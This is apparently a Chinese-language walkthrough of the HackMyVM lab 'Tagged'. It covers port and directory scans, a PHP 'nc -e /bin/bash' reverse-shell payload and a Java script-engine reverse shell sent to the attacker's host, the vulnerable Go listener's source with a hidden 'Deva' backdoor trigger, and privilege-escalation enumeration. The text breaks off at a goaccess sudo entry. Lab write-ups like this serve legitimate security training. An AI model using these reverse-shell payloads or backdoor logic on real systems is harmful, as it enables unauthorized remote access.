![\"image-20240413153714337\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729296.png\")
<\/div>\n
![\"image-20240413154257788\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729297.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:80\nOpen 172.20.10.4:7746\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack nginx 1.18.0\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.18.0\n| http-methods: \n|_ Supported Methods: GET HEAD\n7746\/tcp open unknown syn-ack\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port7746-TCP:V=7.94SVN%I=7%D=4\/13%Time=661A37AD%P=x86_64-pc-linux-gnu%r\nSF:(NULL,1,">")%r(GenericLines,2,">>")%r(GetRequest,2,">>")%r(HTTPOptions,\nSF:2,">>")%r(RTSPRequest,2,">>")%r(RPCCheck,1,">")%r(DNSVersionBindReqTCP,\nSF:1,">");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/report.php (Status: 200) [Size: 0]\n\/index.php (Status: 200) [Size: 12582828]<\/code><\/pre>\n\u4e0b\u9762\u627e\u5230dns\u4ee5\u540e\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -u http:\/\/tagged.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n![\"image-20240413155311235\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5636\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-13 03:45:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.18.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ Multiple index files found: \/index.html, \/index.php.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time: 2024-04-13 03:45:42 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u6539\u4e00\u4e0bdns\uff1a<\/p>\n
172.20.10.4 tagged.hmv<\/code><\/pre>\n\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\u653e\u5230\u4e0a\u9762\u53bb\u4e86\u3002<\/p>\n
\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/tagged.hmv\/index.php<\/code><\/pre>\n<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u7aef\u53e3<\/h3>\n
<\/div><\/p>\n\u5173\u95ed\u4e86\uff1f\u91cd\u542f\u9776\u673a\u5c1d\u8bd5\u8fde\u63a5\uff0c\u67e5\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\nAbout TCP\/UDP ports<\/strong><\/p>\nTCP port 7746<\/strong> uses the Transmission Control Protocol. TCP is one of the main protocols in TCP\/IP networks. TCP is a connection-oriented protocol, it requires handshaking to set up end-to-end communications. Only when a connection is set up user's data can be sent bi-directionally over the connection.
\nAttention! TCP guarantees delivery of data packets on port 7746<\/strong> in the same order in which they were sent. Guaranteed communication over TCP port 7746<\/strong> is the main difference between TCP and UDP. UDP port 7746<\/strong> would not have guaranteed communication as TCP.UDP on port 7746<\/strong> provides an unreliable service and datagrams may arrive duplicated, out of order, or missing without notice. UDP on port 7746<\/strong> thinks that error checking and correction is not necessary or performed in the application, avoiding the overhead of such processing at the network interface level.
\nUDP (User Datagram Protocol) is a minimal message-oriented Transport Layer protocol (protocol is documented in IETF RFC 768).
\nApplication examples that often use UDP: voice over IP (VoIP), streaming media and real-time multiplayer games. Many web applications use UDP, e.g. the Domain Name System (DNS), the Routing Information Protocol (RIP), the Dynamic Host Configuration Protocol (DHCP), the Simple Network Management Protocol (SNMP).
\nTCP vs UDP - TCP: reliable, ordered, heavyweight, streaming; UDP - unreliable, not ordered, lightweight, datagrams.<\/p>\nTCP \u7aef\u53e37746<\/strong>\u4f7f\u7528\u4f20\u8f93\u63a7\u5236\u534f\u8bae\u3002 TCP \u662f TCP\/IP \u7f51\u7edc\u4e2d\u7684\u4e3b\u8981\u534f\u8bae\u4e4b\u4e00\u3002 TCP\u662f\u4e00\u79cd\u9762\u5411\u8fde\u63a5\u7684\u534f\u8bae\uff0c\u5b83\u9700\u8981\u63e1\u624b\u6765\u5efa\u7acb\u7aef\u5230\u7aef\u7684\u901a\u4fe1\u3002\u4ec5\u5f53\u5efa\u7acb\u8fde\u63a5\u65f6\uff0c\u7528\u6237\u6570\u636e\u624d\u80fd\u901a\u8fc7\u8be5\u8fde\u63a5\u53cc\u5411\u53d1\u9001\u3002
\n\u6ce8\u610f\u529b\uff01 TCP \u4fdd\u8bc1\u5728\u7aef\u53e37746<\/strong>\u4e0a\u6309\u7167\u53d1\u9001\u6570\u636e\u5305\u7684\u987a\u5e8f\u4f20\u9001\u6570\u636e\u5305\u3002\u901a\u8fc7 TCP \u7aef\u53e37746<\/strong>\u8fdb\u884c\u6709\u4fdd\u8bc1\u7684\u901a\u4fe1\u662f TCP \u548c UDP \u4e4b\u95f4\u7684\u4e3b\u8981\u533a\u522b\u3002 UDP \u7aef\u53e37746<\/strong>\u65e0\u6cd5\u4fdd\u8bc1\u50cf TCP \u4e00\u6837\u8fdb\u884c\u901a\u4fe1\u3002
\n\u7aef\u53e37746<\/strong>\u4e0a\u7684 UDP\u63d0\u4f9b\u4e0d\u53ef\u9760\u7684\u670d\u52a1\uff0c\u6570\u636e\u62a5\u53ef\u80fd\u4f1a\u91cd\u590d\u5230\u8fbe\u3001\u4e71\u5e8f\u6216\u4e22\u5931\uff0c\u6055\u4e0d\u53e6\u884c\u901a\u77e5\u3002\u7aef\u53e37746<\/strong>\u4e0a\u7684 UDP\u8ba4\u4e3a\u9519\u8bef\u68c0\u67e5\u548c\u7ea0\u6b63\u662f\u4e0d\u5fc5\u8981\u7684\uff0c\u4e5f\u4e0d\u5728\u5e94\u7528\u7a0b\u5e8f\u4e2d\u6267\u884c\uff0c\u4ece\u800c\u907f\u514d\u4e86\u5728\u7f51\u7edc\u63a5\u53e3\u7ea7\u522b\u8fdb\u884c\u6b64\u7c7b\u5904\u7406\u7684\u5f00\u9500\u3002
\nUDP\uff08\u7528\u6237\u6570\u636e\u62a5\u534f\u8bae\uff09\u662f\u4e00\u79cd\u6700\u5c0f\u7684\u9762\u5411\u6d88\u606f\u7684\u4f20\u8f93\u5c42\u534f\u8bae\uff08\u8be5\u534f\u8bae\u8bb0\u5f55\u5728 IETF RFC 768 \u4e2d\uff09\u3002
\n\u7ecf\u5e38\u4f7f\u7528 UDP \u7684\u5e94\u7528\u793a\u4f8b\uff1aIP \u8bed\u97f3 (VoIP)\u3001\u6d41\u5a92\u4f53\u548c\u5b9e\u65f6\u591a\u4eba\u6e38\u620f\u3002\u8bb8\u591aWeb\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528UDP\uff0c\u4f8b\u5982\u57df\u540d\u7cfb\u7edf(DNS)\u3001\u8def\u7531\u4fe1\u606f\u534f\u8bae(RIP)\u3001\u52a8\u6001\u4e3b\u673a\u914d\u7f6e\u534f\u8bae(DHCP)\u3001\u7b80\u5355\u7f51\u7edc\u7ba1\u7406\u534f\u8bae(SNMP)\u3002
\nTCP \u4e0e UDP - TCP\uff1a\u53ef\u9760\u3001\u6709\u5e8f\u3001\u91cd\u91cf\u7ea7\u3001\u6d41\u5f0f\u4f20\u8f93\uff1b UDP - \u4e0d\u53ef\u9760\u3001\u65e0\u5e8f\u3001\u8f7b\u91cf\u7ea7\u6570\u636e\u62a5\u3002<\/p>\n<\/blockquote>\n\u8bf4\u4eba\u8bdd\u5c31\u662f\u53d1\u9001\u6570\u636e\u7684\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff0c\u6ca1\u6709\u56de\u663e\u4e0d\u77e5\u9053\u662f\u5565\uff0c\u5c1d\u8bd5\u4f7f\u7528< ><\/code>\u5305\u88f9\u547d\u4ee4\uff0c\u4f46\u662f\u6267\u884c\u4e0d\u4e86\u53cd\u5f39shell\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8f93\u5165test\uff0c\u53d1\u73b0\u5b58\u5728\u56de\u663e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Tagged]\n\u2514\u2500$ nc 172.20.10.9 7746\n>test\n><\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ curl http:\/\/172.20.10.9\/index.php\n<h1>TAGZ<\/h1>\n<pre>test<\/pre><\/code><\/pre>\n\u6240\u4ee5\u5b83\u662f\u653e\u5728<pre><\/code>\u6807\u7b7e\u5185\u7684\uff0c\u5c1d\u8bd5\u6267\u884c\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n<\/div><\/p>\nString command = "var host = '172.20.10.8';" +\n "var port = 1234;" +\n "var cmd = '\/bin\/bash';"+\n "var s = new java.net.Socket(host, port);" +\n "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+\n "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+\n "var po = p.getOutputStream(), so = s.getOutputStream();"+\n "print ('Connected');"+\n "while (!s.isClosed()) {"+\n " while (pi.available() > 0)"+\n " so.write(pi.read());"+\n " while (pe.available() > 0)"+\n " so.write(pe.read());"+\n " while (si.available() > 0)"+\n " po.write(si.read());"+\n " so.flush();"+\n " po.flush();"+\n " java.lang.Thread.sleep(50);"+\n " try {"+\n " p.exitValue();"+\n " break;"+\n " }"+\n " catch (e) {"+\n " }"+\n "}"+\n "p.destroy();"+\n "s.close();";\nString x = "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"JavaScript\\").eval(\\""+command+"\\")";\nref.add(new StringRefAddr("x", x);<\/code><\/pre>\n\u592a\u957f\u4e86\uff0c\u5c1d\u8bd5\u6267\u884cphp\u4ee3\u7801\uff1a<\/p>\n
<?php system('nc -e \/bin\/bash 172.20.10.8 1234');?><\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@tagged:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@tagged:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 ..\n-rw-r--r-- 1 root root 46 Nov 14 2022 index.html\n-rwxrwxr-- 1 www-data shyla 93 Apr 13 10:38 index.php\n-rw-r--r-- 1 root root 982 Nov 14 2022 magiccode.go\nlrwxrwxrwx 1 root root 24 Nov 14 2022 report.html -> \/var\/www\/html\/report.php\n-rwxrwxr-- 1 uma uma 0 Nov 14 2022 report.php\n(remote) www-data@tagged:\/var\/www\/html$ cd ..\/;ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 html\n(remote) www-data@tagged:\/var\/www$ cd ..;ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 2 root root 4096 Sep 3 2022 backups\ndrwxr-xr-x 9 root root 4096 Nov 14 2022 cache\ndrwxr-xr-x 25 root root 4096 Nov 14 2022 lib\ndrwxrwsr-x 2 root staff 4096 Sep 3 2022 local\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lock -> \/run\/lock\ndrwxr-xr-x 7 root root 4096 Nov 14 2022 log\ndrwxrwsr-x 2 root mail 4096 Nov 14 2022 mail\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 opt\nlrwxrwxrwx 1 root root 4 Nov 14 2022 run -> \/run\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 spool\ndrwxrwxrwt 4 root root 4096 Apr 13 10:39 tmp\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 www\n(remote) www-data@tagged:\/var$ mail\nbash: mail: command not found\n(remote) www-data@tagged:\/var$ cd backups\/\n(remote) www-data@tagged:\/var\/backups$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Sep 3 2022 .\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 ..\n(remote) www-data@tagged:\/var\/backups$ cd \/home\n(remote) www-data@tagged:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 shyla\ndrwxr-xr-x 2 uma uma 4096 Nov 14 2022 uma\n(remote) www-data@tagged:\/home$ cd uma\n(remote) www-data@tagged:\/home\/uma$ ls -la\ntotal 24\ndrwxr-xr-x 2 uma uma 4096 Nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 ..\n-rw------- 1 uma uma 52 Nov 14 2022 .Xauthority\nlrwxrwxrwx 1 uma uma 9 Nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 uma uma 220 Nov 14 2022 .bash_logout\n-rw-r--r-- 1 uma uma 3526 Nov 14 2022 .bashrc\n-rw-r--r-- 1 uma uma 807 Nov 14 2022 .profile\n(remote) www-data@tagged:\/home\/uma$ cd ..\/shyla\/\n(remote) www-data@tagged:\/home\/shyla$ ls -la\ntotal 2856\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 shyla shyla 9 Nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 shyla shyla 220 Nov 14 2022 .bash_logout\n-rw-r--r-- 1 shyla shyla 3526 Nov 14 2022 .bashrc\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 .local\n-rw-r--r-- 1 shyla shyla 807 Nov 14 2022 .profile\n-rw-r--r-- 1 shyla shyla 66 Nov 14 2022 .selected_editor\n-rwxr-xr-x 1 shyla shyla 2887781 Nov 14 2022 magiccode\n-rw------- 1 shyla shyla 13 Nov 14 2022 user.txt\n(remote) www-data@tagged:\/home\/shyla$ file magiccode \nmagiccode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, Go BuildID=64S6_nwugG3_G5eg4W47\/N9jZMz6Tf8jSquz3zHWZ\/m2G1xxhQAmuoXQo5mOBM\/6EluGNnXWpMQ6kk7GEnO, with debug_info, not stripped\n(remote) www-data@tagged:\/home\/shyla$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/Tagged\n(local) pwncat$ download magiccode\nmagiccode \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 2.9\/2.9 MB \u2022 9.3 MB\/s \u2022 0:00:00[04:52:15] downloaded 2.89MiB in 0.40 seconds<\/code><\/pre>\n<\/div><\/p>\n\u597d\u590d\u6742\uff0c\u5148\u4e0d\u641e\u8fd9\u4e2a\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@tagged:\/home\/shyla$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\numa:x:1000:1000:uma,,,:\/home\/uma:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nshyla:x:1001:1001:,,,:\/home\/shyla:\/bin\/bash\n(remote) www-data@tagged:\/home\/shyla$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@tagged:\/home\/shyla$ cd \/\n(remote) www-data@tagged:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 root root 7 Nov 14 2022 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 boot\ndrwxr-xr-x 17 root root 3140 Apr 13 10:26 dev\ndrwxr-xr-x 73 root root 4096 Apr 13 10:26 etc\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 home\nlrwxrwxrwx 1 root root 31 Nov 14 2022 initrd.img -> boot\/initrd.img-5.10.0-19-amd64\nlrwxrwxrwx 1 root root 31 Nov 14 2022 initrd.img.old -> boot\/initrd.img-5.10.0-18-amd64\nlrwxrwxrwx 1 root root 7 Nov 14 2022 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 14 2022 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 14 2022 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 media\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 mnt\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 opt\ndr-xr-xr-x 141 root root 0 Apr 13 10:26 proc\ndrwx------ 4 root root 4096 Nov 14 2022 root\ndrwxr-xr-x 17 root root 500 Apr 13 10:26 run\nlrwxrwxrwx 1 root root 8 Nov 14 2022 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 srv\ndr-xr-xr-x 13 root root 0 Apr 13 10:26 sys\ndrwxrwxrwt 9 root root 4096 Apr 13 10:39 tmp\ndrwxr-xr-x 14 root root 4096 Nov 14 2022 usr\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 var\nlrwxrwxrwx 1 root root 28 Nov 14 2022 vmlinuz -> boot\/vmlinuz-5.10.0-19-amd64\nlrwxrwxrwx 1 root root 28 Nov 14 2022 vmlinuz.old -> boot\/vmlinuz-5.10.0-18-amd64\n(remote) www-data@tagged:\/$ cd opt\n(remote) www-data@tagged:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\n(remote) www-data@tagged:\/opt$ cd \/tmp;ls -la\ntotal 36\ndrwxrwxrwt 9 root root 4096 Apr 13 10:39 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .ICE-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .Test-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .X11-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .XIM-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .font-unix\ndrwx------ 3 root root 4096 Apr 13 10:26 systemd-private-c17be820856f4776a84d72e729eed924-systemd-logind.service-xX0pSg\ndrwx------ 3 root root 4096 Apr 13 10:26 systemd-private-c17be820856f4776a84d72e729eed924-systemd-timesyncd.service-qWsaHi\n(remote) www-data@tagged:\/tmp$ cd \/var\/www\/html;ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 ..\n-rw-r--r-- 1 root root 46 Nov 14 2022 index.html\n-rwxrwxr-- 1 www-data shyla 93 Apr 13 10:38 index.php\n-rw-r--r-- 1 root root 982 Nov 14 2022 magiccode.go\nlrwxrwxrwx 1 root root 24 Nov 14 2022 report.html -> \/var\/www\/html\/report.php\n-rwxrwxr-- 1 uma uma 0 Nov 14 2022 report.php\n(remote) www-data@tagged:\/var\/www\/html$ file magiccode.go \nmagiccode.go: C source, ASCII text\n(remote) www-data@tagged:\/var\/www\/html$ cat magiccode.go \npackage main\n\nimport (\n "bufio"\n "fmt"\n "net"\n "os"\n"log"\n"os\/exec"\n"strings"\n)\n\nfunc main() {\n ln, _ := net.Listen("tcp", ":7746")\n for {\n conn, _ := ln.Accept()\n go receiveData(conn)\n go sendData(conn, "")\n }\n}\n\nfunc sendData(conn net.Conn,mensaje string) {\n fmt.Fprintf(conn, mensaje)\n}\n\nfunc receiveData(conn net.Conn){\n for {\n var tohtml string\n sendData(conn, ">")\n message, _ := bufio.NewReader(conn).ReadString('\\n')\n message = strings.TrimRight(message, "\\r\\n")\n tohtml = "<pre>"+message+"<\/pre>"\n OMG := "Deva"\n if message == OMG {\n cmd := exec.Command("nc","-e","\/bin\/bash","127.0.0.1","7777")\n _ = cmd.Run()\n }\n file, err := os.OpenFile("\/var\/www\/html\/index.php", os.O_APPEND|os.O_WRONLY, 0644)\n _, _ = fmt.Fprintln(file, tohtml)\n if err != nil {\n log.Fatal(err)\n }\n defer file.Close()\n }\n}<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u53cd\u5f39shell\u3002\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6269\u5c55\u4e00\u4e0b\uff1a<\/p>\n
whoami;id\nshyla\nuid=1001(shyla) gid=1001(shyla) grupos=1001(shyla)\nscript \/dev\/null -c \/bin\/bash\nScript iniciado, el fichero de anotaci\u00f3n de salida es '\/dev\/null'.\nshyla@tagged:~$ ls -la\nls -la\ntotal 2856\ndrwxr-xr-x 3 shyla shyla 4096 nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 nov 14 2022 ..\nlrwxrwxrwx 1 shyla shyla 9 nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 shyla shyla 220 nov 14 2022 .bash_logout\n-rw-r--r-- 1 shyla shyla 3526 nov 14 2022 .bashrc\ndrwxr-xr-x 3 shyla shyla 4096 nov 14 2022 .local\n-rwxr-xr-x 1 shyla shyla 2887781 nov 14 2022 magiccode\n-rw-r--r-- 1 shyla shyla 807 nov 14 2022 .profile\n-rw-r--r-- 1 shyla shyla 66 nov 14 2022 .selected_editor\n-rw------- 1 shyla shyla 13 nov 14 2022 user.txt\nshyla@tagged:~$ cat user.txt\ncat user.txt\ng0disah4ck3r\nshyla@tagged:~$ sudo -l\nsudo -l\nMatching Defaults entries for shyla on tagged:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser shyla may run the following commands on tagged:\n (uma) NOPASSWD: \/usr\/bin\/goaccess\n (ALL) NOPASSWD: \/usr\/bin\/php \/var\/www\/html\/report.php\nshyla@tagged:~$ cat \/var\/www\/html\/report.php\ncat \/var\/www\/html\/report.php\nshyla@tagged:~$ file \/usr\/bin\/goaccess\nfile \/usr\/bin\/goaccess\n\/usr\/bin\/goaccess: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=1366b6cf356515bf1cc544825c8ea3d952208409, for GNU\/Linux 3.2.0, stripped\nshyla@tagged:~$ \/usr\/bin\/goaccess\n\/usr\/bin\/goaccess\nError opening terminal: unknown.<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\u73a9\u610f\uff1a<\/p>\n
<\/div>
